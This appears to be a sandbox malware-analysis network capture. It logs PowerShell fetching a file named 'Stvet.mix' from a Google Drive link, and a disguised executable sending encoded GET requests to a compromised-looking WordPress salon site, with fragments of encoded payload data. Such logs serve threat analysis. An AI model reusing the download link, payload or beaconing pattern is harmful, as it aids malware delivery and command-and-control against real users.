39 39 65 4e 64 41 47 45 73 71 4f 37 69 2b 37 42 38 66 50 2b 4c 6c 65 55 62 33 50 66 67 57 53 44 75 4f 46 48 39 44 4e 69 63 2b 63 69 45 36 4c 4a 56 62 38 43 4a 65 58 66 50 32 48 54 35 70 68 43 4f 67 34 61 6c 34 6b 62 65 45 57 51 52 7a 72 70 74 72 76 47 6c 2f 54 4c 32 57 50 4b 6c 75 37 53 49 68 4a 4a 5a 42 36 42 30 6e 47 42 44 45 6a 2f 43 51 52 72 6c 65 68 78 36 65 57 55 39 67 6e 58 33 48 64 71 63 76 4e 64 62 55 32 75 56 6b 2f 4b 56 67 56 77 62 4e 4d 71 55 47 51 67 32 71 4f 75 73 4d 61 30 6f 5a 44 31 6e 62 7a 50 54 35 7a 50 58 49 71 6c 47 41 6b 53 58 4b 6b 61 5a 77 65 64 4b 38 6e 46 7a 7a 66 37 7a 30 4d 74 7a 6d 30 38 65 7a 33 73 59 68 6e 33 47 2b 44 4f 64 75 31 32 54 5a 42 74 32 6c 4d 6b 63 55 32 5a 32 4f 4e 76 65 67 70 79 61 6f 64 52 74 58 79 61 32 56 61 41 6e 76 57 2f 79 6e 68 65 46 33 2f 41 2f 34 53 6b 3d
                                                            Data Ascii: jJEDgF=46j9iO5agqM5rv5F70OeCd0TRPBgHeuiHqkdLIUKKkZ1frB/PCuOMs1+W4ip5NiBjx/oSNhdfe62WxmPCCjXS1bR3fj1nimT/Uo8YWpVWmvJXEFUzA0aJuTDnAOmdhEF/Iz5GrzLC9isNadW9m865zesBQ1YpR0wT8xrDxoCYrBpOsMVPOQr+zGtT4cGBkt0WtVAxjRSu4+UJvj21he61iSej7iu+w7f/EPc0WeNz4rhqUHhTsz+bVoWNHIvt/MRdPZZ6EVjNd7AbMj1f1cTJC/mYFApD2rCIdTczBm8CMkX72/WE4tj1qKjGLdUHoeuJrhsm/b5g5DeA5XkT3Av5Kshf/hhPSPJF7kkpVaxDtT8jhI7BFDsEJ3+8pHJIpb5h2QP7sYGVV9Z876SJcTI5fQE4tZdWzIZwLxPcSYHdoL3ulhJbYy6FWdHI4lzCIXE3hufirVSpUzIV4pDDn2ITcfF1siAf+L/2Fy8Rq2XgnXtC5fA+GqLyMzQN/Jl0H7/dWL32veDm1zRnmBssHEzmG55SckNsL9175wAVsjtWtDoldzaEYeVJUHGD17MAZUqOjPcRPPgI1cpBUM16nNdc8RO1QNJRARlOZ6q7pj4xsxBRudIp90kDf87ElPM3ZgMW3oOF/TXj1MQch/wdcWA36Ps6pvmWwLw8sXBLbqycTliUT8p6gTvBVOtXZOu1xV57JcS0KbKlHKPrGppiEQcFa38CduTbITYPDwOz3MuZZlK/D/YGnbrVdnH+F97XqWUuseTJDi50xThph5g+CmgaZzA1EF08JcM+9MxSalkDg3AHJ/XJ4OU9SHoe7iIYeT4vQSKZ9+uwOn8EeHUlexNhgMIM1Vi1xQMuWbsQ8UvOpcLBU1hpkBdeE17w9UzX/6zYdeG4jGm/yUScM925VEW0W8R7YTL7qIENBwrrUnVBSEd8+Hd+1+ZwZy99eNdAGEsqO7i+7B8fP+LleUb3PfgWSDuOFH9DNic+ciE6LJVb8CJeXfP2HT5phCOg4al4kbeEWQRzrptrvGl/TL2WPKlu7SIhJJZB6B0nGBDEj/CQRrlehx6eWU9gnX3HdqcvNdbU2uVk/KVgVwbNMqUGQg2qOusMa0oZD1nbzPT5zPXIqlGAkSXKkaZwedK8nFzzf7z0Mtzm08ez3sYhn3G+DOdu12TZBt2lMkcU2Z2ONvegpyaodRtXya2VaAnvW/ynheF3/A/4Sk=
                                                            Apr 23, 2024 07:55:17.141360998 CEST1289INHTTP/1.1 404 Not Found
                                                            Date: Tue, 23 Apr 2024 05:55:17 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Server: Apache
                                                            X-Powered-By: PHP/8.2.18
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
                                                            Data Raw: 34 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74
                                                            Data Ascii: 451<!DOCTYPE html><html class="pc" lang="ja"><head><meta charset="UTF-8">...[if IE]><meta http-equiv="X-UA-Compatible" content="IE=edge"><![endif]--><meta name="viewport" content="width=device-width"><title> | A-two </title><meta name="description" content=""><link rel="pingback" href="http://a-two-spa-salon.com/xmlrpc.php"><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//a-two-spa-salon.com' /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/feed/" /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/comments/feed/" /><script type="text
                                                            Apr 23, 2024 07:55:17.141380072 CEST179INData Raw: 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e
                                                            Data Ascii: /javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/co
                                                            Apr 23, 2024 07:55:17.141396046 CEST1289INData Raw: 35 61 38 0d 0a 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 61
                                                            Data Ascii: 5a8re\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/a-two-spa-salon.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.4.4"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={s
                                                            Apr 23, 2024 07:55:17.141443014 CEST166INData Raw: 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 3f 6e 65 77 20 4f 66 66 73 63 72 65 65 6e 43 61
                                                            Data Ascii: ined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0
                                                            Apr 23, 2024 07:55:17.141513109 CEST1289INData Raw: 35 61 38 0d 0a 7d 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74
                                                            Data Ascii: 5a8}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsS
                                                            Apr 23, 2024 07:55:17.141547918 CEST166INData Raw: 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79
                                                            Data Ascii: rythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMRe
                                                            Apr 23, 2024 07:55:17.141658068 CEST1289INData Raw: 35 32 31 0d 0a 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68
                                                            Data Ascii: 521ady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSet
                                                            Apr 23, 2024 07:55:17.141693115 CEST31INData Raw: 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0d 0a
                                                            Data Ascii: xt-decoration:none}</style>
                                                            Apr 23, 2024 07:55:17.141792059 CEST1289INData Raw: 35 61 32 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f
                                                            Data Ascii: 5a2<style id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color-
                                                            Apr 23, 2024 07:55:17.141840935 CEST160INData Raw: 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31 2c 31 32 30 2c 32 30 39 29 20 32 30 25 2c 72 67 62 28 32 30 37 2c 34 32 2c 31 38 36 29 20 34 30 25 2c 72 67 62 28 32 33 38
                                                            Data Ascii: radient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradien
                                                            Apr 23, 2024 07:55:17.418909073 CEST1289INData Raw: 32 30 66 34 0d 0a 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 36 2c 32 33 36 29 20 30 25 2c 72 67 62 28 31 35 32 2c 31 35
                                                            Data Ascii: 20f4t--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--lu


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.949723157.7.107.63806540C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 23, 2024 07:55:19.489536047 CEST465OUTGET /3g97/?jJEDgF=14Ldh71M1tAlq6177H/PKNF5DbUzFdqFN6RtTIloW1xTPtpRPWfTFb1ZY6KJ/sGolC/raog+W4a2BjveEWOkXEr3vevJ7TDEj044XktAOzbrek1ipg==&Z0cP=R2YdndZh2B6 HTTP/1.1
                                                            Host: www.a-two-spa-salon.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                            Apr 23, 2024 07:55:19.987687111 CEST510INHTTP/1.1 301 Moved Permanently
                                                            Date: Tue, 23 Apr 2024 05:55:19 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 0
                                                            Connection: close
                                                            Server: Apache
                                                            X-Powered-By: PHP/8.2.18
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            X-Redirect-By: WordPress
                                                            Location: http://a-two-spa-salon.com/3g97/?jJEDgF=14Ldh71M1tAlq6177H/PKNF5DbUzFdqFN6RtTIloW1xTPtpRPWfTFb1ZY6KJ/sGolC/raog+W4a2BjveEWOkXEr3vevJ7TDEj044XktAOzbrek1ipg==&Z0cP=R2YdndZh2B6
                                                            X-Cache: MISS


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.949706142.251.41.144436856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-04-23 05:53:40 UTC215OUTGET /uc?export=download&id=1oDj9i8b8gD74VUcO_0mAaRxSOZjEINB5 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Host: drive.google.com
                                                            Connection: Keep-Alive
                                                            2024-04-23 05:53:40 UTC1582INHTTP/1.1 303 See Other
                                                            Content-Type: application/binary
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Tue, 23 Apr 2024 05:53:40 GMT
                                                            Location: https://drive.usercontent.google.com/download?id=1oDj9i8b8gD74VUcO_0mAaRxSOZjEINB5&export=download
                                                            Strict-Transport-Security: max-age=31536000
                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                            Content-Security-Policy: script-src 'nonce-TPxQd65F1udzaqt9DcU7Og' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                            Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                            Server: ESF
                                                            Content-Length: 0
                                                            X-XSS-Protection: 0
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.949707142.251.35.1614436856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-04-23 05:53:40 UTC233OUTGET /download?id=1oDj9i8b8gD74VUcO_0mAaRxSOZjEINB5&export=download HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Host: drive.usercontent.google.com
                                                            Connection: Keep-Alive
                                                            2024-04-23 05:53:41 UTC4748INHTTP/1.1 200 OK
                                                            X-GUploader-UploadID: ABPtcPrNLcENaCYkfQUv2kC94SqecexxM6DyfLy38rqYkbrCKDU0QTz5ZScEqUjMvmcGzsFm7FDapNeV6Q
                                                            Content-Type: application/octet-stream
                                                            Content-Security-Policy: sandbox
                                                            Content-Security-Policy: default-src 'none'
                                                            Content-Security-Policy: frame-ancestors 'none'
                                                            X-Content-Security-Policy: sandbox
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            Cross-Origin-Embedder-Policy: require-corp
                                                            Cross-Origin-Resource-Policy: same-site
                                                            X-Content-Type-Options: nosniff
                                                            Content-Disposition: attachment; filename="Stvet.mix"
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Credentials: false
                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Desusertion, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                            Accept-Ranges: bytes
                                                            Content-Length: 433144
                                                            Last-Modified: Sun, 21 Apr 2024 19:21:21 GMT
                                                            Date: Tue, 23 Apr 2024 05:53:41 GMT
                                                            Expires: Tue, 23 Apr 2024 05:53:41 GMT
                                                            Cache-Control: private, max-age=0
                                                            X-Goog-Hash: crc32c=3iBiuw==
                                                            Server: UploadServer
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close
                                                            2024-04-23 05:53:41 UTC4748INData Raw: 63 51 47 62 63 51 47 62 75 33 53 79 43 51 44 72 41 72 61 74 36 77 49 30 75 41 4e 63 4a 41 52 78 41 5a 74 78 41 5a 75 35 41 71 6c 6b 34 6e 45 42 6d 33 45 42 6d 34 48 78 62 79 2b 47 52 6e 45 42 6d 2b 73 43 6d 37 75 42 36 57 32 47 34 71 54 72 41 75 4f 43 63 51 47 62 63 51 47 62 36 77 4b 38 61 4c 72 5a 5a 4b 54 56 63 51 47 62 36 77 4a 33 64 6e 45 42 6d 2b 73 43 34 6e 34 78 79 6e 45 42 6d 33 45 42 6d 34 6b 55 43 33 45 42 6d 33 45 42 6d 39 48 69 36 77 4a 4d 66 75 73 43 4e 63 4b 44 77 51 54 72 41 73 69 71 36 77 4a 4a 38 34 48 35 54 48 43 65 41 58 7a 4c 63 51 47 62 63 51 47 62 69 30 51 6b 42 4f 73 43 7a 43 4a 78 41 5a 75 4a 77 33 45 42 6d 2b 73 43 45 65 6d 42 77 2f 36 47 4e 67 46 78 41 5a 74 78 41 5a 75 36 64 52 52 43 44 58 45 42 6d 33 45 42 6d 34 48 79 79 76 34
                                                            Data Ascii: cQGbcQGbu3SyCQDrArat6wI0uANcJARxAZtxAZu5Aqlk4nEBm3EBm4Hxby+GRnEBm+sCm7uB6W2G4qTrAuOCcQGbcQGb6wK8aLrZZKTVcQGb6wJ3dnEBm+sC4n4xynEBm3EBm4kUC3EBm3EBm9Hi6wJMfusCNcKDwQTrAsiq6wJJ84H5THCeAXzLcQGbcQGbi0QkBOsCzCJxAZuJw3EBm+sCEemBw/6GNgFxAZtxAZu6dRRCDXEBm3EBm4Hyyv4
                                                            2024-04-23 05:53:41 UTC4748INData Raw: 45 41 63 48 66 39 77 30 64 50 70 5a 66 50 58 73 4f 41 76 51 32 34 4d 38 6e 48 52 4a 78 4b 4c 59 51 5a 46 6f 47 31 38 31 79 4f 4d 2b 6e 33 58 46 6b 64 6a 4c 79 61 39 4f 37 38 6d 6b 30 49 58 68 4f 6d 7a 75 64 36 6e 39 38 63 56 6e 58 53 32 6d 45 31 76 4b 4e 34 49 4e 30 4c 79 6d 48 34 4d 51 41 69 2b 69 51 41 45 56 69 61 4b 41 4b 51 2b 50 30 37 63 62 36 43 4c 48 6c 66 46 75 32 77 71 51 48 6f 64 78 4c 2b 64 41 78 6c 41 42 4c 59 34 47 6a 47 79 45 2f 41 33 73 75 6d 37 6d 2b 67 41 71 76 7a 46 71 4e 37 53 4d 52 44 57 36 37 4e 37 6d 55 7a 77 54 71 74 4f 31 68 74 65 51 52 42 31 49 68 51 6f 62 71 4a 37 51 42 36 70 44 2f 61 66 31 55 30 4b 77 44 2f 58 55 42 36 72 4e 36 54 45 4f 57 34 70 4e 62 47 31 4d 4b 6c 68 33 5a 62 71 34 7a 2f 72 6c 43 46 45 35 73 70 66 69 36 6a 32
                                                            Data Ascii: EAcHf9w0dPpZfPXsOAvQ24M8nHRJxKLYQZFoG181yOM+n3XFkdjLya9O78mk0IXhOmzud6n98cVnXS2mE1vKN4IN0LymH4MQAi+iQAEViaKAKQ+P07cb6CLHlfFu2wqQHodxL+dAxlABLY4GjGyE/A3sum7m+gAqvzFqN7SMRDW67N7mUzwTqtO1hteQRB1IhQobqJ7QB6pD/af1U0KwD/XUB6rN6TEOW4pNbG1MKlh3Zbq4z/rlCFE5spfi6j2
